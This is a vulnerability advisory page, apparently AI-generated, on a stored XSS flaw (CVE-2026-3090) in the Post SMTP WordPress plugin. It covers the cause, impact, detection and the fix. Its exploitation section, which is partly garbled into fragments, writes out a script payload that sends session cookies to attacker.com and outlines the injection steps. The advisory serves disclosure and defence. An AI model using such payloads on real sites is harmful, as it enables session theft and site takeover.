
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3090 is a Stored Cross-Site Scripting (XSS) vulnerability in the Post SMTP – Complete Email Deliverability and SMTP Solution plugin for WordPress. It affects all versions up to and including 3.8.0, and allows unauthenticated attackers to inject arbitrary web scripts via the event_type parameter due to insufficient input sanitization and output escaping. The vulnerability is only exploitable when the Post SMTP Pro plugin is also installed and its Reporting and Tracking extension is enabled. It was published on March 18, 2026, with a CVSS v3.1 base score of 7.2 (High) (Wordfence, ENISA EUVD).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting). The vulnerable code resides in Postman/PostmanEmailLogs.php (around line 459), where the event_type parameter is not properly sanitized before being stored and later rendered in the WordPress admin interface (WordPress Trac). An unauthenticated attacker can craft a malicious HTTP request that stores a JavaScript payload in the email log, which executes in the browser of any authenticated user (e.g., an administrator) who views the affected log page. Exploitation requires the co-presence of the Post SMTP Pro plugin with its Reporting and Tracking extension active, limiting the attack surface but not eliminating the unauthenticated nature of the injection (Wordfence).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of authenticated WordPress users, including administrators, who view the injected email log pages. This can lead to session token theft, unauthorized administrative actions (such as creating rogue admin accounts, installing malicious plugins, or modifying site content), and potential full site compromise. The scope is changed (S:C in CVSS), meaning the impact extends beyond the plugin itself to the broader WordPress installation and its users (ENISA EUVD, Wordfence).
No public exploit code or active in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.061% (0.000610), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. It was detected by Qualys scanners (detection ID 531155) and disclosed by Wordfence (Wordfence, ENISA EUVD).
/wp-content/plugins/post-smtp/readme.txt) or using tools like WPScan.event_type parameter, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or a payload that creates a new admin user via the WordPress REST API.event_type value. This may involve triggering an email-related action (e.g., a contact form submission or password reset) while manipulating the event_type parameter./wp-content/plugins/post-smtp/; new or modified WordPress admin user accounts not created by legitimate administrators.wp_postman_sent_mail or similar) containing <script> tags or JavaScript event handlers in the event_type or related fields.Users should update the Post SMTP plugin to version 3.8.1 or later, which addresses the insufficient sanitization and output escaping (WordPress Trac Changeset). As an interim workaround, disabling the Post SMTP Pro plugin's Reporting and Tracking extension will prevent exploitation, since the vulnerability is only exploitable when that extension is active. Site administrators should also review email logs for any suspicious entries and audit admin accounts for unauthorized additions (Wordfence).
Wordfence disclosed the vulnerability and included it in their weekly WordPress vulnerability report for March 16–22, 2026 (Wordfence Blog). Sucuri also referenced the vulnerability in their March 2026 vulnerability patch roundup (Sucuri Blog). No significant social media controversy or notable researcher commentary beyond standard disclosure coverage has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."